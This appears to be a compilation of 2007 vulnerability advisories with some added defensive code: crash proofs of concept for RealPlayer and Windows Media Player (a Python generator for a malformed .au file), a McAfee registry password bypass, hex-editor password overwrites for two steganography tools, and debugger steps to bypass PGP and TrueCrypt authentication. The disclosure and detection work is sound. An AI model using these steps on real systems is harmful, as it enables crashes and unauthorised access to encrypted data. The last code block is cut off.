Realplayer 11 DOS attack when processing a malformed AU file on MS Vista and XP
Type     : DOS attack when processing a malformed AU file.
Affected : Realplayer 11 ActiveX on Win Vista and Win XP SP2
Date     : 01-12-2007
Author   : Adonis, Abed safehack.com
Link     : http://www.safehack.com/Advisory/realpdos_au.txt

Disclaimer
----------
The information in this text is believed to be true based on experiments though it may be false. This material is presented for informational purposes ONLY. We do not accept any liability for anything anyone does with this Information.

Brief History
-------------
Link : http://www.safehack.com/Advisory/realpdos_au.txt

RealPlayer 11 is prone to a denial-of-service vulnerability when processing a malformed AU file. A remote attacker can exploit this issue to crash the affected application, denying service to legitimate users.

The Problem
-----------
Instructions:

  630A87D5  894E 76    MOV DWORD PTR DS:[ESI+76],ECX
  630A87D8  1BDB       SBB EBX,EBX
  630A87DA  83E3 03    AND EBX,3
  630A87DD  83C3 08    ADD EBX,8
  630A87E0  0FAFFB     IMUL EDI,EBX
  630A87E3  D1E7       SHL EDI,1
  630A87E5  33D2       XOR EDX,EDX
  630A87E7  F7F7       DIV EDI        <- division by zero, crash

Registers:

  EAX
  ECX
  EDX
  EBX 000B
  ESP 07F5FE14
  EBP 07F5FE24
  ESI 01DE0E48
  EDI
  EIP 630A87E7 pnen3260.630A87E7

Hex Dump:

  00411000  00 00 00 00 9C CF 40 00
  00411008  90 D3 40 00 A0 D3 40 00
  00411010  C0 D3 40 00 E0 D3 40 00
  00411018  00 D4 40 00 10 D4 40 00
  00411020  00 00 00 00 00 00 00 00
  00411028  00 00 00 00 00 00 00 00

-:P.O.C.:-

  # RealPlayer 11 local/remote DoS by A.Sawan aka NtWaK0 and A.Hariri aka nophie
  import sys

  # 24-byte .au header (".snd" magic, header size 0x118, data size 0x42DC,
  # encoding 1 = 8-bit mu-law, sample rate 0x1F40, channel count 0), then the
  # annotation field ("iapetus.au", a quoted copy of the name, "1", zero padding)
  # and four bytes of sample data
  head = (b"\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
          b"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
          b"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
          b"\x00\x31" + b"\x00" * 230 + b"\x66\x66\x66\x00")

  print("[x] RealPlayer 11 DoS by Adonis a.K.a NtWaK0 and Abed aka Nophie.")
  try:
      f = open("test.au", "wb")
  except IOError as e:
      print("Unable to open file ", e)
      sys.exit(0)
  print("[x] File successfully opened for writing.")
  try:
      f.write(head)
  except IOError as e:
      print("Unable to write to file ", e)
      sys.exit(0)
  print("[x] File successfully written.")
  f.close()
  print("[x] Open test.au with RealPlayer 11.")

Peace to you all and Happy New Year full of health and Peace
DOS in Realplayer 11 ActiveX on Win Vista and Win XP SP2
Affected : Realplayer 11 ActiveX on Win Vista and Win XP SP2
Type     : DOS Attack
Date     : 28-11-2007
Author   : Adonis, Abed
Link     : http://www.safehack.com/Advisory/realpdos.txt

Brief History
-------------
GetSourceTransport() fails to handle exceptional conditions, which leads to a DoS (Denial of Service) attack.

GetSourceTransport() is found in rmoc3260.dll which is installed with RealPlayer 11.

Note: This ActiveX can be loaded by IE or any other browser.

Successful exploitation will lead to a remote crash in IE 6/7.

The Problem
-----------
RealPlayer 11 ActiveX DoS Proof-of-Concept

-:PoC:-
1- Copy and paste the following code into filepoc.wsf
2- Run it by double clicking on it

---snip---
targetFile = "C:\Windows\system32\rmoc3260.dll"
prototype  = "Function GetSourceTransport ( ByVal nSourceNum As Integer ) As String"
memberName = "GetSourceTransport"
progid     = "RealAudioObjects.RealAudio"
argCount   = 1

arg1=32767

target.GetSourceTransport arg1
---snip---

Registers:
--
EIP 637F4A02
EAX 0022EC44
EBX 663CCB38 -> 663B7400 -> Uni t;ft;f
ECX 0022EC44
EDX 01536388 -> 638416B8
EDI
ESI
EBP 0022EC68 -> 0022EC78
ESP 0022EC3C

Block Disassembly:
--
637F49F2  JE SHORT 637F49F8
637F49F4  MOV ESI,EAX
637F49F6  JMP SHORT 637F49FA
637F49F8  XOR ESI,ESI
637F49FA  LEA ECX,[EBP-24]
637F49FD  CALL 6381C1F0
637F4A02  MOV EDX,[ESI]          <--- CRASH
637F4A04  LEA EAX,[EBP-4]
637F4A07  PUSH EAX
637F4A08  PUSH 638427D8
637F4A0D  PUSH ESI
637F4A0E  CALL [EDX]
637F4A10  MOV EAX,[EBP+8]
637F4A13  SUB EAX,46
637F4A16  JE 637F4B28

Stack Dump:
--
22EC3C  00 00 00 00 F4 EC 22 00 00 00 00 00 F4 EC 22 07
22EC4C  C0 6D 53 01 00 00 00 00 30 ED 22 00 00 00 00 00  [.mS.]
22EC5C  00 00 00 00 DC 9A 2B 00 00 00 00 00 78 EC 22 00
22EC6C  A8 C7 7F 63 47 00 00 00 FF 7F 00 00 90 EC 22 00  [...cG...]
22EC7C  8E 48 3B 66 88 63 53 01 47 00 00 00 FF 7F 00 00  [.H.f.cS.G...]

Peace to you all and Happy New Year full of health and Peace
DoS in Microsoft Media Player 11 on Win XP SP2
Affected : Microsoft Media Player 11 on Win XP SP2
Type     : DIVISION by ZERO
Result   : DoS
Remote   : YES
Date     : 2007-08-07
Author   : Adonis, Abed
url      : http://www.safehack.com/exp/mp/mplayer11.txt

Disclaimer
----------
This material is presented for informational and educational purposes only. We do not accept any liability for anything anyone does with this information. So, don't shoot the messenger.

Use a computer in ways that ensure respect for your fellows.

Brief History
-------------
A division by zero leads to a denial of service on Microsoft Windows Media Player version 11.

If you open a specially crafted .au file in Windows Media Player you will crash the player with the following error:

  Exception number: c094 (divide by zero)

To see if your Windows Media Player is vulnerable you can use our .au generator coded in python, or you can download the POC file.

Proof-of-Concept
----------------
http://www.safehack.com/exp/mp/iapetus.py (python .au generator)
http://www.safehack.com/exp/mp/iapetus.au (poc file)

If you do not have python installed you can just use the poc file.

DEBUG DUMP
----------
Application exception occurred:
  App: C:\Program Files\Windows Media Player\wmplayer.exe (pid=4972)
  When: 8/7/2007 - 19:50:13.051
  Exception number: c094 (divide by zero)

*> System Information <*
  Computer Name: --
  User Name: --
  Terminal Session Id: 0
  Number of Processors: 1
  Processor Type: x86 Family 15 Model 2 Stepping 4
  Windows Version: 5.1
  Current Build: 2600
  Service Pack: 2
  Current Type: Uniprocessor Free
  Registered Organization: Organization
  Registered Owner: Name

*> State Dump for Thread Id 0x838 <*
  eax= ebx=010a82b0 ecx= edx= esi= edi=000fe3a2
  eip=748fe598 esp=01c8f0c0 ebp=01c8f154 iopl=0  nv up ei pl zr na po nc
  cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=0246

function: quartz
          748fe581 b708      mov   bh,0x8
          748fe583 c1ea02    shr   edx,0x2
          748fe586 3bd1      cmp   edx,ecx
          748fe588 7702      ja    quartz+0xee58c (748fe58c)
          748fe58a 8bd1      mov   edx,ecx
          748fe58c 0fb708    movzx ecx,word ptr [eax]
          748fe58f 56        push  esi
          748fe590 8d740aff  lea   esi,[edx+ecx-0x1]
          748fe594 8bc6      mov   eax,esi
          748fe596 33d2      xor   edx,edx
  FAULT ->748fe598 f7f1      div   ecx          <- FAULT
          748fe59a 8bc6      mov   eax,esi
          748fe59c 5e        pop   esi
          748fe59d 2bc2      sub   eax,edx
          748fe59f c3        ret
          748fe5a0 90        nop
          748fe5a1 90        nop
          748fe5a2 90        nop
          748fe5a3 90        nop
          748fe5a4 90        nop
          748fe5a5 8bff      mov   edi,edi

The Solution
------------
Wait for a patch from Microsoft
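Both .au crashes above (RealPlayer 11 and Windows Media Player 11) come down to a header field being used as a divisor without a check: the PoC header carries a channel count of 0, and the frame-size arithmetic in the disassembly divides by a value derived from it. The following Python is an added example, not code from the advisories or from either vendor: it parses the 24-byte big-endian Sun .au header, shows the unchecked computation next to a validating parser that rejects the malformed fields first, and runs both over a constructed header using the PoC's values. The encoding-to-sample-size table is the standard .au code list; the sample byte strings are constructed here.

```python
import struct

AU_MAGIC = b".snd"

# Bytes per sample for the standard Sun/NeXT .au encoding codes. Anything not
# listed is rejected rather than guessed.
SAMPLE_BYTES = {
    1: 1,   # 8-bit G.711 mu-law
    2: 1,   # 8-bit linear PCM
    3: 2,   # 16-bit linear PCM
    4: 3,   # 24-bit linear PCM
    5: 4,   # 32-bit linear PCM
    6: 4,   # 32-bit IEEE float
    7: 8,   # 64-bit IEEE float
    27: 1,  # 8-bit G.711 A-law
}
HEADER_FMT = ">4sIIIII"    # magic, header size, data size, encoding, sample rate, channels
UNKNOWN_SIZE = 0xFFFFFFFF  # data size value meaning "unknown" in the .au format


def frame_count_unchecked(data):
    """The shape of the flawed computation: header fields feed a divisor straight
    from the file. A channel count of 0 raises ZeroDivisionError here, which is
    what the DIV instruction in the crash dumps does in native code."""
    _, hdr_size, _, encoding, _, channels = struct.unpack(HEADER_FMT, data[:24])
    return (len(data) - hdr_size) // (SAMPLE_BYTES.get(encoding, 1) * channels)


def validate_au(data):
    """Return a list of problems with the header; an empty list means it is safe
    to derive frame sizes and counts from it."""
    if len(data) < 24:
        return ["file shorter than the 24-byte fixed header"]
    magic, hdr_size, data_size, encoding, rate, channels = struct.unpack(HEADER_FMT, data[:24])
    problems = []
    if magic != AU_MAGIC:
        problems.append("bad magic %r" % magic)
    if hdr_size < 24 or hdr_size > len(data):
        problems.append("header size %d outside the file" % hdr_size)
    if encoding not in SAMPLE_BYTES:
        problems.append("unsupported encoding %d" % encoding)
    if rate == 0:
        problems.append("sample rate is 0")
    if channels == 0:
        problems.append("channel count is 0 (frame size would be 0: division by zero)")
    if data_size != UNKNOWN_SIZE and hdr_size <= len(data) and data_size > len(data) - hdr_size:
        problems.append("data size %d exceeds the %d bytes present" % (data_size, len(data) - hdr_size))
    return problems


def frame_count_checked(data):
    """Same computation as frame_count_unchecked, but only after validate_au passes."""
    problems = validate_au(data)
    if problems:
        raise ValueError("; ".join(problems))
    _, hdr_size, data_size, encoding, _, channels = struct.unpack(HEADER_FMT, data[:24])
    payload = len(data) - hdr_size if data_size == UNKNOWN_SIZE else data_size
    return payload // (SAMPLE_BYTES[encoding] * channels)


# Constructed samples. POC_LIKE copies the six header words of the advisory's
# PoC (0x118, 0x42DC, 1, 0x1F40, 0) in front of a zero annotation and 4 data
# bytes, giving the same 284-byte layout; GOOD is a well-formed 8-frame mu-law file.
POC_LIKE = struct.pack(HEADER_FMT, AU_MAGIC, 0x118, 0x42DC, 1, 0x1F40, 0) + b"\x00" * 256 + b"fff\x00"
GOOD = struct.pack(HEADER_FMT, AU_MAGIC, 24, 8, 1, 8000, 1) + b"\x00" * 8

if __name__ == "__main__":
    print("PoC-like header:", validate_au(POC_LIKE))
    print("well-formed header frames:", frame_count_checked(GOOD))
```

The validator also flags the PoC's data-size field (0x42DC claims far more audio than the file holds), so a parser built this way refuses the file for two independent reasons before any arithmetic runs.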
Bypassing McAfee Enterprise Password Protection
Date : 03/16/2007
URL: http://homepage.mac.com/adonismac/Advisory/bypass_mcafee_entreprise_password.html

Affected Product / OS
=====================
Product Name and Version: McAfee VirusScan Enterprise 8.5.0.i, maybe older versions too.
Tested on OS: Windows XP, 2003

Bug Type
========
Type: Bad Design

Bug Results
===========
Bypass Password Protection

Bug Description
===============
McAfee VirusScan Enterprise allows you to lock the user interface using a password. A user with write access to the Windows registry can bypass it. The password is saved in UIP under the key

  HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\DesktopProtection

or it can be under

  HKEY_LOCAL_MACHINE\SOFTWARE\Network Associates\TVD\VirusScan Enterprise\CurrentVersion

If you remove the value of UIP you will end up bypassing the password. You can replace the value if you wish with a known value, but why bother when you can remove the password. I think this type of protection is not too secure.

Proof-Of-Concept
================
http://homepage.mac.com/adonismac/Advisory/crack_mcafee_password_protection.html

Peace to you all
A Major design Bug in Camouflage 1.2.1 (latest)
Direct Link: http://homepage.mac.com/adonismac/Advisory/steg/camouflage.html

Disclaimer
==========
This material is presented for informational purposes ONLY. I do not condone or encourage vandalism or theft. I do not accept any liability for anything anyone does with this information. So, don't shoot the messenger. Remember: Use a computer in ways that ensure respect for your fellows.

Author
======
Adonis a.K.a. NtWaK0
Abed a.K.a. NoPh0BiA

Affected Product
================
Camouflage 1.2.1 (latest). http://camouflage.unfiction.com/

Bug Type and Date
=================
Type: Very Bad Design
Date: 01/07/2007

Bug Results
===========
Cracking encrypted (Camouflage 1.2.1) files without any bruteforce. WHY LOSE TIME ON MATH AND BRUTEFORCE WHEN YOU CAN PLAY WITH YOUR HEX EDITOR :-).

Bug Description
===============
Firstly, computer forensic investigators can take advantage of this bug to access files protected with (Camouflage 1.2.1) without knowledge of the original password. Now it is time to check your cold cases for steganography files.

You can crack (Camouflage 1.2.1) encrypted files very easily, in fact in less than two minutes. The problem is similar to the bug I found in PGP last year. (Camouflage 1.2.1) leaves a footprint after you stag a file. If you look at the end of your stagged file you will notice the following:
http://homepage.mac.com/adonismac/Advisory/steg/camouf3.jpg

So now we have identified the stagged file; our next step is to access the HIDDEN messages or files without cracking the password. Here is how.

Proof-of-Concept (THIS WILL WORK ON HIDDEN FILES)
=================================================
For screen captures please check http://homepage.mac.com/adonismac/Advisory/steg/camouflage.html

Step 01
1. We use a file cover (carrier file) called "Adonis_Carrier_File1.jpg"
2. We will hide inside it a file called "Adonis_Hidden_File1.txt"
3. We will right click "Adonis_Hidden_File1.txt" and select camouflage
4. We will use a password ""
5. We generated the stagged file; we will call it "Adonis_Camouflage_Stagged_File.jpg"
   http://homepage.mac.com/adonismac/Advisory/steg/camouf1.jpg

Step 02
NOTE: We will use a different carrier and a different input file to show you it will work even if you have a different input and different carriers.

To access the hidden file WITHOUT the original password "" we will do the following:
1. We use a file cover (carrier file) called "Adonis_Carrier_File2.jpg"
2. We will hide inside it a file called "Adonis_Hidden_File2.txt"
3. We will right click "Adonis_Hidden_File2.txt" and select camouflage
4. We will use a password "a"
5. We generated the stagged file; we will call it "Adonis_break_camouflage.jpg"
6. We will open both pictures in a hex editor
7. We will replace, as indicated in the screen capture below, the bytes in "Adonis_Camouflage_Stagged_File.jpg" with the ones from "Adonis_break_camouflage.jpg"
8. We will save the file.
9. We will right click "Adonis_Camouflage_Stagged_File.jpg", select camouflage and use "a" as password.

YES we overwrite the password with something we know. Simple hein !!!

Now time to break camouflage.
=============================
We will open "Adonis_Camouflage_Stagged_File.jpg" and "Adonis_break_camouflage.jpg" in a hex editor. We will start from the END of the file and try to locate 00 02 63 (like 10 lines from the end of the file). Once we have located the values we start REPLACING from LEFT to right starting after 00 20 63 (63 is the first letter of the password a) (Do not replace 63, it is your password = a). In this example I will replace the password with a. So I will replace F4 1B 43 with 20 20 20.
http://homepage.mac.com/adonismac/Advisory/steg/camouf2.jpg

To sum up, the password is saved starting from 00 00 20 00 (ANYTHING AFTER THIS POINT IS THE PASSWORD AND THIS CAN BE OVERWRITTEN AS YOU SEE)

Testing the results
===================
http://homepage.mac.com/adonismac/Advisory/steg/camouflage.html

Peace to you all
Copyright © 2007 Adonis a.K.a NtWaK0
A Major design Bug in Steganography 1.7.x, 1.8 (latest) (Updated Version)
Direct Link http://homepage.mac.com/adonismac/Advisory/steg/steganography.html

Disclaimer
==========
This material is presented for informational purposes ONLY. I do not condone or encourage vandalism or theft. I do not accept any liability for anything anyone does with this information. So, don't shoot the messenger. Remember: Use a computer in ways that ensure respect for your fellows.

Author
======
Adonis a.K.a. NtWaK0
Abed a.K.a. NoPh0BiA

Affected Product
================
Steganography 1.7.1 and 1.8 (latest). http://www.securekit.com/hidefiles.htm

Bug Type and Date
=================
Type: Very Bad Design
Date: 01/07/2007

Bug Results
===========
Cracking encrypted (steganography application 1.7.x 1.8) files without any bruteforce. WHY LOSE TIME ON MATH AND BRUTEFORCE WHEN YOU CAN PLAY WITH YOUR HEX EDITOR :-).

Bug Description
===============
Firstly, computer forensic investigators can take advantage of this bug to access files protected with (steganography application 1.7.x 1.8) without knowledge of the original password. Now it is time to check your cold cases for steganography files.

You can crack (steganography application 1.7.x 1.8) encrypted files very easily, in fact in less than two minutes. The problem is similar to the bug I found in PGP last year. (steganography application 1.7.x 1.8) leaves a footprint after you stag a file. If you look at the end of your stagged file you will notice it will end with 30 00 0X FF FF. So a simple HEX search will reveal all stagged files.

So now we have identified the stagged file; our next step is to access the HIDDEN messages or files without cracking the password. Here is how.

Proof-of-Concept (THIS WILL WORK ON HIDDEN MESSAGES and HIDDEN FILES)
=====================================================================
For screen captures please check http://homepage.mac.com/adonismac/Advisory/steg/steganography.html

Step 01
1. We use a file cover (carrier file) called "picture_original.jpg"
2. We will hide inside it a message "Hello Adonis"
3. We will use a password "aa"
4. We generated the steged file; we will call it "picture_with_hidden_msg.jpg"

Step 02
To access the hidden message WITHOUT the original password "aa" we will do the following:
1. We will use any other picture file, say "mypicture.jpg"
2. We will hide inside it a message "WHATEVER"
3. We will use a password "a"
4. We generate the steged file; we will call it "mypicture_steg.jpg"
5. We will open both pictures in a hex editor
6. We will replace the last 20 bytes of "picture_with_hidden_msg.jpg" with the ones from mypicture_steg.jpg
7. We will save the picture "picture_with_hidden_msg.jpg"
8. We will open "picture_with_hidden_msg.jpg" with (steganography application 1.7.x 1.8) using "a" as password.

YES we overwrite the password with something we know. Simple hein !!!

Peace to you all
Copyright © 2007 Adonis a.K.a NtWaK0
Cracking Steganography Application in less than ONE minute
Good day

Direct Link to Advisory http://homepage.mac.com/adonismac/Advisory/steg/steganography.html

Affected Product
================
Steganography 1.7.1 and 1.8 (latest). http://www.securekit.com/hidefiles.htm

Bug Type and Date
=================
Type: Bad Design
Date: 01/06/2007

Bug Results
===========
Cracking encrypted steganography files without any bruteforce.

Bug Description
===============
You can crack steganography encrypted files very easily, in fact in less than one minute. The problem is similar to the bug I found in PGP last year.

First you have to identify the steged files. The Steganography application leaves a footprint after you stego a file. If you look at the end of your steged file you will notice it will end with 30 00 02 FF FF. So a simple HEX search will reveal all steged files.

So now we have identified the steged file; the next step is to access the HIDDEN message without cracking the password. Here is how.

Proof-of-Concept
================
Step 01
1- We use a file cover (carrier file) called "picture_original.jpg"
2- We will hide inside it a message "Hello Adonis"
3- We will use a password "aa"
4- We generated the steged file; we will call it "picture_with_hidden_msg.jpg"

Step 02
==
To access the hidden message WITHOUT the original password "aa" we will do the following:
1- We will use any other picture file, say "mypicture.jpg"
2- We will hide inside it a message "WHATEVER"
3- We will use a password "a"
4- We generate the steged file; we will call it "mypicture_steg.jpg"
5- We will open both pictures in a hex editor
6- We will replace the last 20 bytes of "picture_with_hidden_msg.jpg" with the ones from mypicture_steg.jpg
7- Save picture "picture_with_hidden_msg.jpg"
8- Open it using a as password.

YES we overwrite the password with something we know. Simple hein !!!

Peace
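The two Steganography advisories above both rest on the same forensic observation: the tool leaves a fixed trailer (30 00 02 FF FF, or 30 00 0X FF FF in the updated version) at the end of the carrier, so a hex search finds every treated file. The Python below is an added example for examiners, not the advisory author's code: it checks a file's last five bytes against that footprint (the X nibble is taken as "any low nibble under a zero high nibble", an assumption), and independently measures how many bytes sit after a JPEG's end-of-image marker, which a clean JPEG never has. The sample files are constructed here.

```python
import os

JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"


def steg_trailer_match(data):
    """True when the last five bytes look like the advisories' footprint:
    30 00 0X FF FF, with the X digit left free (assumed to mean any value 00..0F)."""
    if len(data) < 5:
        return False
    t = data[-5:]
    return t[0] == 0x30 and t[1] == 0x00 and (t[2] & 0xF0) == 0x00 and t[3:] == b"\xff\xff"


def bytes_after_eoi(data):
    """Number of bytes following the last JPEG end-of-image marker. A clean JPEG
    ends on the marker, so anything past it was appended; None if no marker."""
    idx = data.rfind(JPEG_EOI)
    if idx < 0:
        return None
    return len(data) - (idx + len(JPEG_EOI))


def classify(data):
    """Both indicators for one file; the trailer check is exact for this tool,
    the appended-bytes count catches other append-style hiding as well."""
    return {
        "is_jpeg": data.startswith(JPEG_SOI),
        "steg_trailer": steg_trailer_match(data),
        "bytes_after_eoi": bytes_after_eoi(data),
    }


def scan_directory(root):
    """Walk a tree and return (path, indicators) for files carrying the trailer
    or, for JPEGs, any data past the EOI marker. Unreadable files are skipped."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue
            info = classify(data)
            if info["steg_trailer"] or (info["is_jpeg"] and info["bytes_after_eoi"]):
                hits.append((path, info))
    return hits


# Constructed samples: a minimal clean JPEG-shaped file, and the same file with
# an appended block that ends in the 30 00 02 FF FF footprint.
CLEAN = JPEG_SOI + b"A" * 10 + JPEG_EOI
TAGGED = CLEAN + b"payload" + b"\x30\x00\x02\xff\xff"

if __name__ == "__main__":
    print("clean :", classify(CLEAN))
    print("tagged:", classify(TAGGED))
```

Reading whole files into memory keeps the example short; for large evidence sets, seek to the end and read only the tail for the trailer check, and treat the appended-bytes count as a lead to examine rather than proof by itself, since some cameras and editors also write data after the EOI marker.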
RE: A Nasty Security Bug that affects PGP Virtual Disks & PGP SDA, PGP 8.x & 9.x and Truecrypt.
Firstly, we appreciate the truecrypt team's comments but on the other hand we do not agree on some.

--Adonis Comment--
I do not agree with some of truecrypt's comments, especially the quoted text below. What if you had created a virtual disk and given that to someone. That someone uses it as his/her own disk and decides to change the password because they own the disk now (you gave it to them with the pass). So they did change the password, but the originator can still access that disk if he/she replaces the passphrase bytes in the binary file. So I consider this an attack on data INTEGRITY and data AVAILABILITY since the legitimate user will be denied access to the disk after replacing the passphrase bytes.
-- End Comment--

"In conclusion, this is not a "security bug", but design/feature. Also, to exploit the design, the adversary would have to know your password first (or have your keyfiles). That means, for example, that he would capture it using a keystroke logger. If that was the case, then all security would be practically lost on that machine."

Peace
Proof of concept that PGP AUTHENTICATION CAN BE BYPASSED WITHOUT PATCHING
This is to answer Mr Jon Callas (PGP CTO) and to show him the last proof-of-concept. If he did not get it we consider we have done our part to report a BIG problem in PGP unless this is some kind of HIDDEN feature.

--Adonis, Abed Comments--
We do not agree with some of PGP's comments. We do not know why they just see one side of the coin. What if you had created a virtual disk and given that to someone. That someone uses it as his/her own disk and decides to change the password because they own the disk now (you gave it to them with the pass). So they did change the password, but the originator can still access that disk if he/she replaces the passphrase bytes in the binary file. So I consider this an attack on data INTEGRITY and data AVAILABILITY since the legitimate user will be denied access to the disk after replacing the passphrase bytes.

"why you do not want to see that your password verification can be simply bypassed, besides a reputable co. like PGP should at least put anti-debugging tweaks, or even encrypt/hide the passphrase location"

To PGP: your authentication can be bypassed, even if you have created two different .sda files with two different contents. The authentication can be overwritten and the file can be extracted if you use a debugger; if you do not use a debugger you will be able to just bypass the authentication but without extraction. Why don't you see that, Mr. Jon? Instead of bitching and stuff? Why can't you be professional and just explain facts after you do your homework with a nice debugger? Is that too much to ask? I think we are talking among humans and adults, no?

We think Mr. Jon (PGP) should play this flash video SLOW, REAL SLOW.
http://www.safehack.com/Advisory/pgp/answerjon.html

PGP comments: http://www.securityfocus.com/archive/1/435155

Quote from Mr Jon's comments:
"For completeness, I'll note that we are discussing whether we should add in a warning dialog to the passphrase change on a PGP Disk, to tell the user that an attacker who has learned an old passphrase, has an old disk and a hex editor can patch the disk so that it can be opened. On the one hand, this might be a good thing to do".

So if Mr Jon does not see the problem why are they talking about adding a message box? Why is the passphrase location not hidden? etc. I still see this as INTEGRITY and AVAILABILITY attacks on PGP. I do not think it is normal behavior of an encryption application to reveal its passphrase location and I do not see bypassing the passphrase dialog-box as a Feature either.

Proof of concept that PGP AUTHENTICATION CAN BE BYPASSED WITHOUT PATCHING THE BINARY FILE EVEN.
This Flash video is dedicated to Mr. Jon Callas (PGP CTO, CSO).
http://www.safehack.com/Advisory/pgp/proof_of_concept_PGP_Authentication_BYPASS.html

We had reported that PGP Authentication can be bypassed by patching the binary file. After reading Mr. Jon Callas' NON PROFESSIONAL answer, Abed and I decided to show him that is not true. By using a SIMPLE Debugger PGP Authentication can be bypassed.

Here are Mr Jon Callas' Comments http://www.securityfocus.com/archive/1/435155
"Summing up, we are disappointed that for whatever reasons, we were not contacted about this research before it was put on the web and posted on bugtraq. Had we been contacted, we could discuss this in private rather than have to air the details of this misunderstanding in a public forum. I am truly sorry for the sake of the Information Security Institute of Quebec and its staff that this complex issue has turned into a public brouhaha."

We load the file in the debugger and set the break points, then we start by hitting F9. We will see the password dialog; we enter ANY password here.

When it stops at 00409797, hit F9 6 times. You see on

  00405D70 |. E8 4FFB CALL a_sda.004058C4

we hit F9 6 times. A break point should be set on 00405D70 to see this.

After running the sda in olly we end up here. We hit F9 a couple of times then we change ESI EDI on

  00409797 |. F3:A7 REPE CMPS DWORD PTR ES:[EDI],DWORD PTR D>;

We see the stack values:
  ECX=0002 (decimal 2.)
  DS:[ESI]=stack [00BBF68C]=DC3F5C82   <-- IF WE ENTER A BAD PASSWORD THESE WON'T BE THE SAME
  ES:[EDI]=stack [00BBFF98]=DC3F5C82

EQUAL... WE JUST MAKE THEM EQUAL THEN CONTINUE THE QUEST. AT THIS POINT PGP Authentication is bypassed.

I hope that helps Mr. Jon (PGP) see the problem. Again Mr Jon, bitching does not help you fix your products.
-- End Comment--

Peace
A Nasty Security Bug that affects PGP Virtual Disks & PGP SDA, PGP 8.x & 9.x and Truecrypt.
Affected Products:
 * PGP 8.x, PGP 9.x, maybe older versions too
 * Truecrypt 4.2, maybe older versions too

// Full detail can be found here //
<> http://www.safehack.com/Advisory/pgp/PGPcrack.html
<> http://www.safehack.com/Advisory/truecrypt/truecrypt.html

If you would like to watch the flash video check the following links.
<> pgpdiskvideo.html  Tested on version 8.1 and the latest 9.02
   http://www.safehack.com/Advisory/pgp/pgpdiskvideo.html
<> truecrypt.html  Tested on the latest version truecrypt-4.2.zip
   http://www.safehack.com/Advisory/truecrypt/truecrypt.html

Note: If you put stuff inside your test file you need to use a debugger to extract the data. If you just follow the video you will see how it is done without a debugger and an empty file.

The How?
I was able to ACCESS PGP encrypted disks if the disk was encrypted with a passphrase or a public Key. This method will work on both, scary huh :-)

You need the following tools:
--
1. A Brain
2. A Hex Editor.
3. PGP 8.1 Enterprise or Personal. You can use 9.x too. My feeling is this method will work on older versions too, because it is a design flaw in the PGP application, not in the PGP algorithm.
4. A Debugger. Not needed if you wanna backdoor pgp (ollydbg)

During my tests I have found that PGP virtual DISK and PGP Self Extractable file SDA have a SERIOUS security bug. I would rather say a design bug. PGP disk or SDA can be cracked in 3 major steps:
1. Editing the PGP protected file using a hex editor. (Patching the passphrase).
2. Tracing the PGP protected file using a debugger. (You need a lot of time and coding/cracking experience)
3. Patching the responsible bytes.

I have spent only a couple of days debugging but surely a lot more time is needed. But once the process is understood it is a question of finding the right bytes and patching them.

Conclusions for 6 days debugging and testing:
=
* PGP Virtual Disk and PGP SDA have a serious bug. I have tested PGP 8.1 Enterprise. Other versions may be vulnerable too.
* PGP corporation made the same error in PGP 9.x; you can bypass the passphrase Dialog box the same way.
* PGP corporation could avoid this type of issue by calculating the HASH of the encrypted file. They should make it harder to locate the passphrase.
* PGP Virtual Disk First Level protection bypass. Passphrase bypass. (Working 100%)
* PGP Virtual Disk Backdooring (Working 100%).
* PGP Virtual Disk Mounting / Adding Users / Deleting Users / Re-Encrypting Disk (Working 100%).
* PGP Virtual Disk Mounting and Data Access (Working 40%. Need more time to debug).
* PGP SDA Passphrase bypass. (Working 100%)
* PGP SDA Extraction is possible IF the input file is the same (Working 100% Patching using a Debugger)
* PGP SDA Extraction is possible of any file (Working 80%. Need more time to debug)
* OTHER AFFECTED PRODUCTS:
  o iOPUS Secure Email Attachments (SEA) V1.0
  o Truecrypt Free open-source disk encryption software 4.2
* WINZIP was not affected.
  1- In winzip you do not know where the password location is
  2- If you change one bit your file won't work
* I DO NOT HAVE more time to test, but I am sure many smart dudes out there would love to play some more.
* To do: Build an application to mount PGP Virtual disk using this bug.
* To do: Build an application to extract PGP SDA files using this bug.

After spending 6 days on this I had decided to stop. But I will be doing more testing when I have some free time. You are free to do your own tests. If you wish to share your own test or finding with me please feel free to contact me at [EMAIL PROTECTED]

PGP SDA authentication method
=
Let's say you created a text file and wrote inside it "aa", then created an SDA. IF you hex edit the output exe, you will notice at the very bottom of the file some bytes separated by 803E.

Ex: E7 93 A0 90 E9 62 D1 21 803E A1 50 AF 5F 6F 9E FE D6

Analysing the bytes carefully, you will notice that 803E is the value used for a loop. The loop starts at 0040590D. Further analysis showed that the bytes right before 803E are used for extraction and authentication.

Authentication is done in the following way: When someone enters a passphrase a series of instructions is executed against the bytes right before 803E, to be exact in the function at address 00404E8F. This function generates a series of bytes which are compared later on to the bytes AFTER 803E. If they match you are granted auth.

The auth. byte comparison is done in the following instruction:
00409797 |. F3:A7 REPE CMPS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI
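The design point running through the PGP and TrueCrypt discussion above (the passphrase-change scenario in the replies, and the SDA verifier bytes described in this section) is that a passphrase block stored beside the ciphertext only proves the passphrase matches that block; if a passphrase change rewrites the block but leaves the master key and data untouched, a saved copy of the earlier block still fits. The Python below is an added toy model, not PGP's or TrueCrypt's on-disk format: a header holds a salt, the master key wrapped under a PBKDF2-derived key, and a verification tag; the body is encrypted and MACed under the master key. It contrasts a passphrase change that only re-wraps with one that re-keys, which is the mitigation. The stream cipher built from HMAC in counter mode, the labels, the iteration count and all names are constructed for the demo.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000  # PBKDF2 work factor for the passphrase-derived key (constructed value)


def kdf(passphrase, salt):
    """Derive a 32-byte key-encryption key from the passphrase and a per-header salt."""
    return hashlib.pbkdf2_hmac("sha256", passphrase.encode(), salt, ITERATIONS, 32)


def keystream(key, label, length):
    """Toy stream cipher: HMAC-SHA256 in counter mode. Constructed for this demo
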